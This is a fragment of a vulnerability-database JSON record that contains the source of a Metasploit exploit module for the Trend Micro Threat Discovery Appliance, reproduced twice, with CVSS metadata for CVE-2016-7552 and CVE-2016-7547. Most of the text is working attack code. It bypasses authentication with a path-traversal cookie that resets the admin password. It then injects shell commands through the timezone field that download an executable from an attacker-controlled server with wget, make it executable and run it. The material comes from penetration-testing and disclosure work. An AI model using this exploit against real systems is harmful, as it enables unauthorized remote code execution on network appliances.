'/']),\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']),\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\n OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]),\n\n ])\n end\n\n def check\n if do_login\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'),\n 'cookie' => @cookie,\n 'method' => 'GET',\n }, 1)\n if res and res.code == 200 and res.body =~ /About Trend Micro/\n version = \"#{$1}\" if res.body =~ /var 
ver_str = new String\\(\"(.*)\"\\)/\n case version\n when /2.6.1062/\n return Exploit::CheckCode::Vulnerable\n end\n end\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n if datastore['AUTHBYPASS']\n print_status(\"Bypassing authentication...\")\n if reset_password\n print_good(\"The password has been reset!\")\n print_status(\"Waiting for the administrator to reboot...\")\n pwn_after_reboot\n end\n else\n if do_login\n pwn\n else\n fail_with(Failure::NoAccess, \"Authentication failed\")\n end\n end\n end\n\n def reset_password\n c = \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'),\n 'method' => 'GET',\n 'cookie' => c,\n })\n\n if res and res.code == 200 and res.headers.to_s =~ /Backtrace/\n return true\n end\n return false\n end\n\n def pwn\n start_http_server\n print_good(\"Logged in\")\n download_exec\n end\n\n def pwn_after_reboot\n @rebooted = false\n while !@rebooted\n if do_login\n @rebooted = true\n pwn\n end\n end\n end\n\n def on_request_uri(cli, request)\n if (not @pl)\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\n return\n end\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\n @elf_sent = true\n send_response(cli, @pl)\n end\n\n def start_http_server\n @pl = generate_payload_exe\n @elf_sent = false\n\n downfile = rand_text_alpha(8+rand(8))\n resource_uri = '/' + downfile\n\n # do not use SSL for the attacking web server\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\n service_url_payload = srv_host + resource_uri\n\n 
print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\n start_service({'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }})\n\n datastore['SSL'] = true if ssl_restore\n connect\n end\n\n def exec(cmd)\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'),\n 'cookie' => @cookie,\n 'method' => 'POST',\n 'vars_post' => {\n 'act' => 'save',\n 'timezone' => cmd,\n }\n }, 1)\n end\n\n def download_exec\n @bd = rand_text_alpha(8+rand(8))\n register_file_for_cleanup(\"/tmp/#{@bd}\")\n exec(\"|`wget #{@service_url} -O /tmp/#{@bd}`\")\n exec(\"|`chmod 755 /tmp/#{@bd}`\")\n exec(\"|`/tmp/#{@bd}`\")\n\n # we need to delay, for the stager\n select(nil, nil, nil, 5)\n end\n\n def do_login\n\n begin\n login = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'passwd' => datastore['PASSWORD'],\n 'isCookieEnable' => 1,\n }\n })\n\n # these are needed due to the reboot\n rescue Rex::ConnectionRefused\n return false\n rescue Rex::ConnectionTimeout\n return false\n end\n if login and login.code == 200 and login.body =~ /frame\\.cgi/\n @cookie = \"session_id=#{$1};\" if login.get_cookies =~ /session_id=(.*);/\n return true\n end\n return false\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T17:16:30", "description": "This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance. The first is an authentication bypass vulnerability via a file delete in logoff.cgi which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552). The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi interface (CVE-2016-7547). 
Note: You have the option to use the authentication bypass or not since it requires that the server is rebooted. The password reset will render the authentication useless. Typically, if an administrator can't log in, they will bounce the box. Therefore, this module performs a heartbeat request until the box is bounced and then attempts to log in and to perform the command injection. This module has been tested on version 2.6.1062r1 of the appliance.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-10T18:32:58", "type": "metasploit", "title": "Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7547", "CVE-2016-7552"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/TRENDMICRO_THREAT_DISCOVERY_ADMIN_SYS_TIME_CMDI/", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < 
Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution',\n 'Description' => %q{\n This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance.\n The first is an authentication bypass vulnerability via a file delete in logoff.cgi\n which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552).\n The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi\n interface (CVE-2016-7547).\n\n Note: You have the option to use the authentication bypass or not since it requires\n that the server is rebooted. The password reset will render the authentication useless.\n Typically, if an administrator cant login, they will bounce the box. Therefore, this\n module performs a heartbeat request until the box is bounced and then attempts to login\n and to perform the command injection. 
This module has been tested on version 2.6.1062r1\n of the appliance.\n },\n 'Author' =>\n [\n 'mr_me <steventhomasseeley@gmail.com>', # vuln + msf\n 'Roberto Suggi Liverani @malerisch', # vuln + msf\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://asciinema.org/a/112480'], # demo\n [ 'CVE', '2016-7552'], # auth bypass\n [ 'CVE', '2016-7547'], # cmdi\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Privileged' => true,\n 'Payload' =>\n {\n 'DisableNops' => true,\n },\n 'Targets' =>\n [\n [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ]\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2017-04-10'))\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'The target URI', '/']),\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']),\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\n OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]),\n\n ])\n end\n\n def check\n if do_login\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'),\n 'cookie' => @cookie,\n 'method' => 'GET',\n }, 1)\n if res and res.code == 200 and res.body =~ /About Trend Micro/\n version = \"#{$1}\" if res.body =~ /var ver_str = new String\\(\"(.*)\"\\)/\n case version\n when /2.6.1062/\n return Exploit::CheckCode::Vulnerable\n end\n end\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n if datastore['AUTHBYPASS']\n print_status(\"Bypassing authentication...\")\n if reset_password\n print_good(\"The password has been reset!\")\n print_status(\"Waiting for the administrator to reboot...\")\n pwn_after_reboot\n end\n else\n if do_login\n pwn\n else\n fail_with(Failure::NoAccess, \"Authentication failed\")\n end\n end\n end\n\n def reset_password\n c = \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"\n res = send_request_cgi({\n 'uri' => 
normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'),\n 'method' => 'GET',\n 'cookie' => c,\n })\n\n if res and res.code == 200 and res.headers.to_s =~ /Backtrace/\n return true\n end\n return false\n end\n\n def pwn\n start_http_server\n print_good(\"Logged in\")\n download_exec\n end\n\n def pwn_after_reboot\n @rebooted = false\n while !@rebooted\n if do_login\n @rebooted = true\n pwn\n end\n end\n end\n\n def on_request_uri(cli, request)\n if (not @pl)\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\n return\n end\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\n @elf_sent = true\n send_response(cli, @pl)\n end\n\n def start_http_server\n @pl = generate_payload_exe\n @elf_sent = false\n\n downfile = rand_text_alpha(8+rand(8))\n resource_uri = '/' + downfile\n\n # do not use SSL for the attacking web server\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\n service_url_payload = srv_host + resource_uri\n\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\n start_service({'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }})\n\n datastore['SSL'] = true if ssl_restore\n connect\n end\n\n def exec(cmd)\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'),\n 'cookie' => @cookie,\n 'method' => 'POST',\n 'vars_post' => {\n 'act' => 'save',\n 'timezone' => cmd,\n }\n }, 1)\n end\n\n def download_exec\n @bd = rand_text_alpha(8+rand(8))\n register_file_for_cleanup(\"/tmp/#{@bd}\")\n exec(\"|`wget #{@service_url} -O /tmp/#{@bd}`\")\n exec(\"|`chmod 755 
/tmp/#{@bd}`\")\n exec(\"|`/tmp/#{@bd}`\")\n\n # we need to delay, for the stager\n select(nil, nil, nil, 5)\n end\n\n def do_login\n\n begin\n login = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'passwd' => datastore['PASSWORD'],\n 'isCookieEnable' => 1,\n }\n })\n\n # these are needed due to the reboot\n rescue Rex::ConnectionRefused\n return false\n rescue Rex::ConnectionTimeout\n return false\n end\n if login and login.code == 200 and login.body =~ /frame\\.cgi/\n @cookie = \"session_id=#{$1};\" if login.get_cookies =~ /session_id=(.*);/\n return true\n end\n return false\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}